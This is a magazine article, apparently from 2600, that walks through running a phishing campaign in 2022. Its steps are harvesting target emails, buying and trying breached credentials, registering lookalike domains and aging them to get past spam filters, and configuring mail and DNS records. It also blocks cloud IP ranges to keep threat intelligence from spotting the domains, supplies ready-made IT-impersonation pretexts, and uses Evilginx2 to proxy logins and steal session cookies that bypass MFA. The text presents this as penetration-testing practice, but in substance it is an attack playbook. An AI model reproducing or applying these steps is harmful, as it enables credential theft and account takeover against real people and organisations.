Phishing in 2022

by Jeff Barron

Phishing remains the most effective way to penetrate an organization from the outside.

The Verizon 2021 Data Breach Investigations Report (DBIR) states that a median average of 3.5 percent of users click the phishing link.  This was a median; some organizations had clickthrough rates of greater than 40 percent.  It's funny, even if you don't follow the tips in this article and your phish ends up in spam, you still have a chance.  Phishing is alive and well in 2022.

In this article, I will show you how to do it.  No more cloning websites.  Two-factor authentication?  We can beat that.

O.K., so you have your target?  Well, there is a bunch of OSINT to be done before you caneven set up your domain.  A sock puppet account on LinkedIn is really good for mapping out relationships inside of the target organization.  Other social media can reveal useful things for the target as well, but I mostly stay with LinkedIn.

Using the website phonebook.cz, I discovered 307 email addresses for 2600.com.  Now, I have no interest or intention of phishing the good folks at 2600 or anyone that isn't paying me to do so.  However, it shows how effective phonebook.cz is at quickly displaying email addresses by just providing a domain name.  Another commonly used tool is "theHarvester" which is available on GitHub and packaged with Kali.

O.K., so you've got emails and maybe some information for pretexts from your OSINT analysis.  This is the point where you should search for breached credentials for your target.  If you haven't been collecting breach dumps and don't know anyone who has, then I recommend an awesome service: Dehashed.  You can get an account for $5 at dehashed.com and it's well worth it.  You can also check for the existence of breached credentials without paying anything.  Once you have obtained your breached creds, then it's time to try them out.  If you can send an email as someone in the organization, then that will add credibility to your phish.

It's time to register a domain.

The first thing we want to do is examine our target domain name.  Can we get a different TLD?  Using a tool at dnstwist.it, one can see that there are some shady 2600 domains like 2600.cn and 2600.cu that are likely not related to 2600.com.  You may get lucky and get the .org or .net version of your target.  It is also worth checking for expired domains.  You can find those on expireddomains.net.

As far as registrars, I don't really have an opinion.  The cheaper the better.  I've used Namecheap in the past and it's done the job.  After you register your domain, the next step is to sit on it for at least seven days.  If your domain is less than seven days old when your phish goes out, it will be sent straight to spam.

The next thing you'll want to do is to get a VPS for your domain.  I use Digital Ocean droplets, but there are probably better and cheaper options out there.  On your Linux-based VPS, you'll want to install Postfix and Mailutils.  (Mailutils is the package name for Debian/Ubuntu-based distros.)

Setting up Postfix is out of the scope of this article.  I'll include an awesome reference at the end of this article for those who want to learn more about how to do it.  Essentially, it boils down to adding your domain to three files (/etc/postfix/transport, /etc/postfix/virtual_domains, and /etc/postfix/virtual_regexp).  Remember to configure hostname and mailname properly in /etc as well.

We need DNS entries!

You'll want to configure your DNS to have an "A" record pointing towards the IP address of your VPS.  You'll also want an "MX" record pointing at mail.evildomain.tld.  Unfortunately, there is still more DNS work to do.  We must have SPF, DMARC, and DKIM records for our shady domain!  This is fairly easy to do and, again, I point you to the first reference at the bottom of this article for more details from HackTricks.  After you have set up SPF, DMARC, and DKIM records, then you also need a reverse DNS entry or rDNS "PTR" record that resolves the IP address of the VPS to the domain.

So we have finished our setup.

It's time to test our mail and see how well it will do with spam filters.  HackTricks recommends a website called mail-tester.com.  You can send an email to it and similar services from the command line with Mailutils:

$ echo "my test message" | mail -s "My test message" generatedAddress@mail-tester.com

After testing the email, there is one more thing I do on my VPS box.  I use iptables to block AWS, Azure, and GCP.  I don't have good data on this, but I strongly believe this allows my evil domains to live longer without getting burned by threat intelligence companies scanning the Internet for bad domains like ours.

Pretexts!

So what are we going to say to get the user to click?  I have two trusty pretexts that are effective.  They are "Hey, I'm (insert name of IT person found on LinkedIn) and I noticed some unusual activity on your Office 365 account.  Would you help me out and check and see if this is you?  Thank you so much! (insert link)" and "Hey we are resetting all passwords as we integrate our new vendors.  Please go to (insert link) and follow the prompts as soon as possible.  Thanks!  (Insert name of IT person you found on LinkedIn.".

It's good to personalize the email as much as possible and say "Hi (name of victim)," but that can be tedious so I usually just make it generic for all, then send the phish to everyone (except the IT department).

At this point, we have most of what we need to begin this engagement.

But what are we linking to?  We haven't cloned any websites!  The reason we haven't is that we are going to use Evilginx2.

From the GitHub page, the project self describes as follows: "Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication."

Evilginx2 is amazing.  Imagine our victim uses Office 365.  We can generate a link with Evilginx2 that when the user clicks it, will be redirected through our site and get proxied to the actual site itself.  So on one side we have the victim user, in the middle is our VPS, and on the other side is Office 365.  It looks identical because it is the actual site.

Because of where the VPS sits during this attack, you can also capture session cookies generated if the victim user gets a push notification or enters a code - since we are proxying the connection, we will get that cookie too and be able to bypass multi-factor authentication in this way.

Evilginx2 will also download TLS/SSL certs for you when you run it.  I prefer running it from Docker as it's quick and easy.  The Evilginx2 GitHub page has great videos explaining how to use it and how it works under the hood.

All right, so if you've gotten this far, you now have everything you need to conduct a modern, MFA-bypassing, phishing attack.  Please use this power for good.  I recommend reading through the references for more detailed information on some of the areas I glossed over.

If you want to talk more about offensive security, please feel free to shoot me an email.

A big shout-out and thank you to the folks who helped teach me this stuff: Critical Path Security, Black Hills Infosec, the amazing folks at HackTricks, Kuba Gretsky of the Evilginx2 project, and 2600 Magazine, which inspired a 12-year-old version of me to build a Red Box.

So long, and thanks for all the phish.

References
Return to $2600 Index